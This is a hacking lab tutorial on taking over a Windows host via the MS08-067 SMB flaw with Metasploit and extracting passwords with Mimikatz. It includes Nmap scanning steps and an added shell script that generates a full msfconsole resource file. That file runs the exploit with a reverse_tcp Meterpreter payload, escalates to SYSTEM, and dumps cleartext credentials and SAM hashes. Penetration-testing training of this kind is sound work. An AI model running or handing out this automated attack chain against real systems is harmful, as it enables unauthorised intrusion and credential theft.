Lab: Password Cracking Using Mimikatz
Overview
In this lab, the student will learn how to recover cleartext passwords from a Windows client
using Mimikatz. Mimikatz has become an extremely effective attack tool against Windows
clients, allowing bad actors to retrieve cleartext passwords, as well as password hashes, from
memory. This lab will provide an overview of Mimikatz's capabilities and the payload vectors
used to deliver it.
Hardware requirements
To begin this lab, we need an active Meterpreter session between Kali and the victim.
Using the Nmap Scripting Engine, you can run the vulnerability-detection scripts against
Nmap's default set of the 1,000 most common ports (not ports 1 to 1000) to check each host
for known vulnerabilities.
My victim's network IP range is 192.168.145.0/24; yours may differ. I got the range by running
ifconfig in my Kali terminal: I took the first three octets of the IP address assigned to my Kali
machine, and that is my network address. Setting the last (fourth) octet to zero and appending
the CIDR notation /24 tells Nmap to scan all 256 possible addresses on this network (the .0
network address and the .255 broadcast address included).
I am treating this as if I were looking for a victim. From my scan results, I see that there is a
machine vulnerable to MS08-067, the flaw exploited by Metasploit's ms08_067_netapi module.
I have gotten enough information from the results, but I can still drill into this machine and
identify specifically which operating system and service pack it runs.
From my first scan, I learned that the machine at 192.168.145.129 was vulnerable to an SMB
exploit on port 445. I then ran a second Nmap script that targets port 445 alone and asks the
SMB service for its operating system information.
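The two scans above, written out as an added example that is not part of the original lab: a small POSIX shell script that derives the /24 range from the Kali box's own address exactly as described (first three octets kept, last octet zeroed) and builds the two Nmap commands. It assumes Nmap's vuln script category for the first scan and the smb-os-discovery script for the second; the address 192.168.145.129 used in the comments is the lab's own example. Real scans only run when the script is invoked with --run, so the helper functions can be exercised offline.

```shell
#!/bin/sh
# Added example (not from the lab): derive the /24 range from Kali's own
# address and build the two Nmap scans used above. The "vuln" category and
# smb-os-discovery are real Nmap scripts; sample addresses are constructed.
set -eu

# Print the /24 network containing an IPv4 address (last octet zeroed),
# e.g. 192.168.145.129 -> 192.168.145.0/24. Returns 1 on a malformed address.
cidr_from_ip() {
    saved_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$saved_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case $octet in ''|*[!0-9]*) return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
    done
    printf '%s.%s.%s.0/24\n' "$1" "$2" "$3"
}

# Address of this Kali box: first entry reported by hostname -I
# (the same value the lab reads off ifconfig).
my_ip() {
    hostname -I | awk '{ print $1 }'
}

# Stage 1: vulnerability-detection scripts against every host in the range.
# With no -p, Nmap probes its default 1,000 most common ports.
vuln_scan_cmd() {
    printf 'nmap -sV --script vuln %s\n' "$1"
}

# Stage 2: ask the SMB service on 445 of one host for its OS and service pack.
os_scan_cmd() {
    printf 'nmap -p 445 --script smb-os-discovery %s\n' "$1"
}

# Only run real scans when explicitly asked; the functions above are pure.
# Usage: ./scan.sh --run [victim-ip]
if [ "${1:-}" = --run ]; then
    range=$(cidr_from_ip "$(my_ip)")
    echo "Scanning $range"
    eval "$(vuln_scan_cmd "$range")"
    if [ $# -ge 2 ]; then
        eval "$(os_scan_cmd "$2")"
    fi
fi
```

The address check rejects anything that is not four decimal octets of 0 to 255, so a typo in the interface address fails loudly instead of producing a bogus range for Nmap.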
The first thing we need to do is get a Meterpreter session going. We have identified that our
victim has an SMB vulnerability on port 445, and Nmap has told us that it is MS08-067, which
Metasploit's exploit module calls ms08_067_netapi. We now must search Metasploit for the
exploit that takes advantage of the vulnerability.
We see that there is an exploit we can use, with use being the operative word. Highlight just the
name of the exploit module in the search results. At the msf prompt, type the word use followed by
one single space, then place your cursor in the terminal window, right-click and select paste.
At the prompt, type: options
This lists the module's settings. The one we must supply is RHOST, the victim's address (current
Metasploit releases name this option RHOSTS but still accept set RHOST).
For me, this command looks like this: set RHOST 192.168.145.129
(This is my victim's IP address, not yours! Yours will differ.)
Once the session is open and the Mimikatz extension has been loaded into Meterpreter with
load mimikatz (it reads LSASS memory, so the session must hold SYSTEM privileges; run
getsystem first if it does not), we can check the version by typing: mimikatz_command -f version
We can use the help mimikatz command to see which credential providers (msv, kerberos,
wdigest and so on) it can query for cleartext passwords. We'll retrieve the passwords for two
sets of credentials later in the lab.
We can get a complete list of the available modules by asking mimikatz_command for a
non-existent module: Mimikatz rejects the name and prints the modules it does have.
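The whole Metasploit sequence from this section, collected into a resource script as an added example (not from the lab and not Metasploit's own code): the shell function below prints an msfconsole resource file for the victim and Kali addresses you pass it. The module, option and command names are real Metasploit and Mimikatz-extension names, but the payload choice, the assumption that the new session is number 1, the use of sessions -C to drive it, and fu:: as the non-existent module name are my additions. Note also that current Metasploit releases ship the kiwi extension in place of mimikatz (load kiwi, then creds_all); the commands below target the older extension this lab uses.

```shell
#!/bin/sh
# Added example (not from the lab): generate an msfconsole resource script
# for the steps above. Module/option/command names are real; the addresses,
# payload, session number and the fu:: module name are assumptions.
set -eu

# Print a resource script that exploits RHOST from LHOST, then runs the
# Mimikatz commands from this lab against the resulting Meterpreter session.
build_rc() {
    rhost=$1
    lhost=$2
    cat <<EOF
# Module matching Nmap's MS08-067 finding.
use exploit/windows/smb/ms08_067_netapi
set RHOST $rhost
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
# Run as a background job so the script keeps control of the console.
exploit -j
sleep 10
# Assumption: the new session is number 1 (check with "sessions -l").
# The extension reads LSASS memory, so escalate to SYSTEM first.
sessions -i 1 -C getsystem
sessions -i 1 -C "load mimikatz"
sessions -i 1 -C "mimikatz_command -f version"
# Asking for a non-existent module (fu::) makes Mimikatz list the real ones.
sessions -i 1 -C "mimikatz_command -f fu::"
# Cleartext credentials from the Kerberos and MSV providers in memory.
sessions -i 1 -C kerberos
sessions -i 1 -C msv
# Hashes from the SAM (not decrypted; usable for pass-the-hash or offline cracking).
sessions -i 1 -C "mimikatz_command -f samdump::hashes"
EOF
}

# Usage: ./lab.sh --run <victim-ip> <kali-ip>
if [ "${1:-}" = --run ]; then
    build_rc "${2:?victim IP}" "${3:?Kali IP}" > mimikatz_lab.rc
    msfconsole -q -r mimikatz_lab.rc
fi
```

The ten-second sleep gives the reverse shell time to call back before the session commands run; if the session comes up with a different number, edit the -i value or drop the hard-coded number and interact by hand.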
Reading Hashes and Passwords from Memory
Windows does not store passwords in the clear: the SAM (and Active Directory) hold password
hashes, and a hash cannot be decrypted. What Mimikatz exploits is that, on these older Windows
versions, the LSASS process keeps the credentials of logged-on users in memory, including
cleartext passwords cached by providers such as WDigest and Kerberos, so Mimikatz reads them
straight out of memory rather than reversing a hash.
We can see both cleartext and hashed passwords with the Mimikatz tool.
With the kerberos command, we see the cleartext of the Administrator password. Remember,
this is being pulled from the memory of the LSASS process, not from the SAM file on disk.
The most common use for Mimikatz is to dump the hashes from the SAM file. The Security
Account Manager (SAM), often called the Security Accounts Manager, is a database file present
in every NT-based Windows release, including Windows XP, Windows Vista and Windows 7, that
stores the password hashes of local user accounts. It can be used to authenticate local users and
remote users logging on with a local account; domain accounts are authenticated by Active
Directory instead. Beginning with Windows 2000 SP4, Active Directory authenticates remote users.
We now use Mimikatz to dump the hashes held in the SAM. These hashes are not decrypted: an
NT hash can be used directly in a pass-the-hash attack, or fed to an offline cracker such as
hashcat to recover the password by guessing.
End of the lab!